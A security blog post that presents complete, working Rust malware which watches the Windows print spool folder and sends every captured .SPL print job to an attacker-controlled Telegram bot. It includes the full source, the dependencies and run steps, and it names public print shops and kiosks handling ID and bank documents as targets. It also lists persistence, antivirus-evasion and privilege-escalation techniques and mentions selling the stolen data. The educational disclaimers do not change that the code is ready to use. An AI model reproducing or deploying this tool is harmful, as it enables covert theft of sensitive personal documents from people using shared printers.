X
BACK TO BLOG
June 2, 2025
7 min read
SECURITY RESEARCH

Hacking Printers - Intercepting Print Jobs with Rust Malware

Hacking Printers - Intercepting Print Jobs with Rust Malware

Disclaimer: I am not claiming to have committed any of the acts described below. This is purely a demonstration meant to prove that your data is not safe anywhere. This guide is for educational and research purposes only. Do not use this information for unauthorized monitoring. This is just a to prove that your data is not safe anywhere

Introduction

Printing might seem like a simple user action, but under the hood, it kicks off a multi-step process involving rendering engines, spoolers, drivers, and hardware. In this post, we'll explore how printing works on Windows, where you can intercept raw print data, and how a Rust-based malware can capture .SPL files and exfiltrate them via Telegram.

This simulation mirrors a real-world attack scenario—such as targeting Xerox shops, printing kiosks, or public computer labs, where users send sensitive documents (passports, bank forms, contracts) to print. An attacker could infect the system with malware to silently grab these print jobs and exfiltrate them.

This kind of attack is stealthy, low-noise, and highly effective—especially in environments where multiple people trust a single shared printer.

Later these data can be sold on black market for hundreds of bitcoins

Malware Goals

The malware in this demo is designed to:

  • Bypass Modern Defenses: Designed to run on the latest Windows builds with fully updated Windows Defender and common antivirus solutions without triggering alerts.
  • Achieve Stealth: Operates quietly in the background by only monitoring system spool activity.
  • Avoid User-Space Hooks: Doesn't tamper with visible application-level processes (e.g., browsers).
  • Access High-Value Data: Captures sensitive documents in raw .SPL form.
  • Evade Detection: Uses Rust for low AV signature overlap and minimal reverse engineering footprint.
  • Exfiltrate Efficiently: Sends captured files via Telegram for simplicity (real-world actors may use stealthier C2 channels).
  • Target Trusted Environments: Exploits shared systems where multiple users trust a single endpoint (e.g., public printing stations).
  • Minimize Forensic Evidence: Avoids persistent artifacts and only interacts with volatile spool data.

Why Rust?

Before we dive into the code, it’s important to understand why Rust was chosen over more common languages like C or Go:

  • Memory Safety Without Garbage Collection: Reduces risk of crashes or detection.

  • Smaller Binary Size than Go: Go binaries are often large and more easily flagged.

  • Low Detection Surface: Rust executables are often harder to reverse engineer.

  • A Rare Breed: Many AV/EDR engines are tuned for malware written in C/C++, .NET, PowerShell, or Python.

Scope of This Demo

To keep the blog short and focused, we’ll only implement the core logic:

  • Monitoring the print spool folder
  • Capturing .SPL files
  • Exfiltrating them via Telegram

We will not cover:

  • Persistence mechanisms (e.g., registry keys, scheduled tasks)
  • Privilege escalation or UAC bypass
  • AV evasion or sandbox detection

These will be covered in future posts or linked via external resources.

How Printing Works in Windows (Step-by-Step)

When a user hits "Print" in an application like Chrome, the following happens:

  1. Document Rendering: The app prepares the content in a printable format—PDF, EMF (Enhanced Metafile), or RAW data.
  2. Spooling: Windows passes the print job to the Print Spooler (spoolsv.exe), which queues and stores it in: 
    C:\Windows\System32\spool\PRINTERS
    Here, .SPL files contain the actual print data, and .SHD files contain job metadata (owner, settings).
  3. Driver Processing: The printer driver converts the job to a format the printer understands (e.g., PCL or PostScript).
  4. Output: The job is sent to the physical or virtual printer for final output.

Why Target Print Spoolers

We target the Windows Print Spooler for a few compelling reasons:

  • Centralized Job Handling: The spooler queues all print jobs, making it a one-stop source to intercept user-generated content from any application.
  • High-Value Data: Print jobs often contain sensitive or confidential data like contracts, invoices, ID documents, or internal reports.
  • System-Level Access: The spool folder (C:\Windows\System32\spool\PRINTERS) is protected, so malware that reaches this location already has elevated privileges, allowing deeper system compromise.
  • Stealth: Monitoring print queues is less likely to trigger antivirus alerts compared to injecting into browsers or stealing clipboard contents.

By targeting the spool folder, malware avoids hooking user-space APIs or manipulating visible interfaces.

What is a .SPL File?

An .SPL (Spool) file contains the raw rendered data of the document being printed. Depending on the printer driver and settings, it may contain EMF, PostScript, or other print-ready formats.

These files:

  • Are temporarily stored in the spool folder.
  • Are locked while the job is active.
  • Can be read once the print job finishes or fails.

Intercepting .SPL files is like grabbing a snapshot of everything the user sends to their printer.

For Demo: Telegram as C2 (In Real Attacks, Other Methods Used)

This demonstration uses Telegram's Bot API to exfiltrate data because it is easy to set up and test. However, real-world malware would use more stealthy, encrypted, and resilient Command and Control (C2) channels, such as:

  • Self-hosted HTTP(S) servers
  • Cloud services like Dropbox, Google Drive, or OneDrive
  • DNS tunneling or covert channels

Telegram is used here for demonstration only.

Malware Target: The Spool Folder

If your goal is to steal print job data, the perfect interception point is:

C:\Windows\System32\spool\PRINTERS

At this location:

  • .SPL files hold the raw data being printed.
  • Files appear immediately after a print job is spooled, but are locked temporarily.

Important: Accessing this folder requires Administrator privileges.

Malware in Action: Rust-Based .SPL Exfiltration Tool

This Rust malware performs the following malicious actions:

  • Watches the spool directory for new print jobs.
  • Grabs .SPL files once they are unlocked.
  • Sends them to an attacker-controlled Telegram bot.

Let’s break it down:

Step 1: Configuration and Privilege Escalation Check

const BOT_TOKEN: &str = "YOUR_BOT_TOKEN";
const CHAT_ID: &str = "YOUR_CHAT_ID";
const SPOOL_FOLDER: &str = r"C:\Windows\System32\spool\PRINTERS";

fn is_admin() -> bool {
    match std::fs::metadata(r"C:\Windows\System32\config\SAM") {
        Ok(_) => true,
        Err(_) => false,
    }
}
  • Malware checks if it's running with Administrator privileges.
  • Hardcoded credentials are used to exfiltrate data via Telegram.

Step 2: File Exfiltration Logic

async fn send_file_to_telegram(file_path: &Path) -> Result<(), Box<dyn std::error::Error>> {
    let filename = file_path.file_name().and_then(|n| n.to_str()).unwrap_or("unknown.spl");
    println!("[+] New SPL file detected: {}", filename);

    sleep(Duration::from_secs(1)).await;

    let mut file = File::open(file_path)?;
    let mut buffer = Vec::new();
    file.read_to_end(&mut buffer)?;

    let form = multipart::Form::new()
        .text("chat_id", CHAT_ID.to_string())
        .text("caption", format!("🖨️ New SPL file: {}", filename))
        .part("document", multipart::Part::bytes(buffer).file_name(filename.to_string()));

    let url = format!("https://api.telegram.org/bot{}/sendDocument", BOT_TOKEN);
    let client = reqwest::Client::new();
    let response = client.post(&url).multipart(form).send().await?;

    if response.status().is_success() {
        println!("    ↳ '{}' sent to Telegram successfully.", filename);
    } else {
        let status = response.status();
        let text = response.text().await?;
        return Err(format!("Telegram API error {}: {}", status, text).into());
    }

    Ok(())
}
  • Waits briefly for .SPL file to be unlocked.
  • Reads the contents into memory.
  • Uses Telegram's Bot API to send the print job to an external attacker.

Step 3: File Monitoring and Triggering the Payload

#[tokio::main]
async fn main() -> Result<(), Box<dyn std::error::Error>> {
    if !is_admin() {
        eprintln!("[!] Please run as Administrator (Elevated privileges required).");
        std::process::exit(1);
    }

    let spool_path = Path::new(SPOOL_FOLDER);
    if !spool_path.exists() || !spool_path.is_dir() {
        eprintln!("[!] Cannot access spool folder: {}
    Check your permissions.", SPOOL_FOLDER);
        std::process::exit(1);
    }

    println!("[*] Monitoring spool directory:
    {}", SPOOL_FOLDER);
    println!("[*] Will forward new .SPL files to Telegram chat ID: {}
", CHAT_ID);

    let (tx, rx) = channel();
    let mut watcher = watcher(tx, Duration::from_millis(500))?;
    watcher.watch(spool_path, RecursiveMode::NonRecursive)?;

    println!("[*] File watcher started. Press Ctrl+C to stop...
");

    loop {
        match rx.recv() {
            Ok(event) => match event {
                DebouncedEvent::Create(path) | DebouncedEvent::Write(path) => {
                    if let Some(ext) = path.extension() {
                        if ext.to_string_lossy().to_lowercase() == "spl" {
                            if let Err(e) = send_file_to_telegram(&path).await {
                                let filename = path.file_name()
                                    .and_then(|name| name.to_str())
                                    .unwrap_or("unknown.spl");
                                eprintln!("    [!] Failed to upload '{}': {}", filename, e);
                            }
                        }
                    }
                }
                DebouncedEvent::Error(e, _) => {
                    eprintln!("[!] Watch error: {:?}", e);
                }
                _ => {}
            },
            Err(e) => {
                eprintln!("[!] Watch error: {:?}", e);
                break;
            }
        }
    }

    Ok(())
}
  • The malware uses a file system watcher to detect .SPL files.
  • On creation or write events, it exfiltrates them in real time.

Dependencies (Cargo.toml)

[package]
name = "spool_monitor"
version = "0.1.0"
edition = "2021"

[dependencies]
notify = "4.0"
reqwest = { version = "0.11", features = ["multipart"] }
tokio = { version = "1.0", features = ["full"] }

Here is the Full code github

Execution of PoC

  1. Initiating a Print Job in Chrome
    A user prints a document from the browser, triggering spool file generation. imgimg

  2. Running the Malware
    The compiled Rust binary is launched via the command line with Administrator privileges. imgimg

  3. Receiving the .SPL File on Telegram
    The .SPL file appears in the attacker’s Telegram bot chat, showing successful exfiltration. imgimg

  4. Extracting the Document
    Using a tool like SPLView, the raw .SPL file is parsed to reconstruct the original printed document. imgimg

Analysis Summary

This is a working Rust malware sample that hijacks print jobs by:

  • Exploiting the Windows spool mechanism.
  • Leveraging cloud APIs (Telegram) to exfiltrate stolen data.

Persistent and Evasion Techniques (Real-World Considerations)

Real-world malware often implements persistence mechanisms to survive reboots and maintain access:

  • Registry Run Keys: Adding entries under HKCU\Software\Microsoft\Windows\CurrentVersion\Run.
  • Scheduled Tasks: Creating a scheduled task that executes the malware at logon.
  • Service Installation: Installing itself as a Windows service to automatically start with the OS.
  • WMI Event Subscription: Using WMI to trigger execution when specific system events occur.

To avoid antivirus (AV) detection, malware might employ:

  • Process Injection: Injecting malicious code into legitimate processes (e.g., svchost.exe) to hide behavior.
  • Reflective DLL Injection: Loading a DLL directly into memory without touching disk.
  • Code Obfuscation: Encrypting or obfuscating strings and code segments.
  • Polymorphic/Metamorphic Techniques: Dynamically changing the code structure to evade signature-based detection.
  • Living off the Land: Using legitimate system tools (e.g., PowerShell, WMI) to perform malicious actions.

Persistence and Evasion: resources

Real-world malware uses a combination of persistence and evasion to survive and avoid detection.

For further exploration of persistence and AV evasion techniques, check out:

I have already covered malware sandbox evasion tactics in this blog link

Privilege Escalation in the Real World

This demo assumes the malware is run as Administrator. This is unrealistic without privilege escalation.

In real-world attacks, malware needs to bypass User Account Control (UAC) or perform privilege escalation via:

  • UAC Bypass Techniques: Hijacking auto-elevated processes or abusing system binaries.
  • Token Stealing: Impersonating or duplicating a privileged token.
  • Exploits: Using known local privilege escalation (LPE) vulnerabilities.
  • Social Engineering: Tricking the user into approving elevation.

Resources:

More Accurate SPL File Access Info

An .SPL (Spool) file contains raw print data but is:

  • Locked during printing.
  • Deleted after printing, depending on the driver and OS settings.

Accessibility varies. Files may be readable after the print job completes or fails, but not always. Some drivers delete .SPL files immediately after printing.

Tools like SPLView can parse and reconstruct contents from .SPL files.

Disclaimer

This blog post is meant purely for educational and research purposes. Unauthorized use of the techniques described may violate local laws.

Always conduct experiments in isolated environments and with permission.

Stay informed. Stay safe.

Follow me on GitHub for code, chaos, and cool projects. Connect with me on LinkedIn because pretending to be an adult is hard.

Happy Hacking !

VIEW ALL ARTICLES

SHARE THIS ARTICLE

root@arxhr007:~$READ_ARTICLE
@ arxhr007
|
Github//Instagram//Linkedin//Email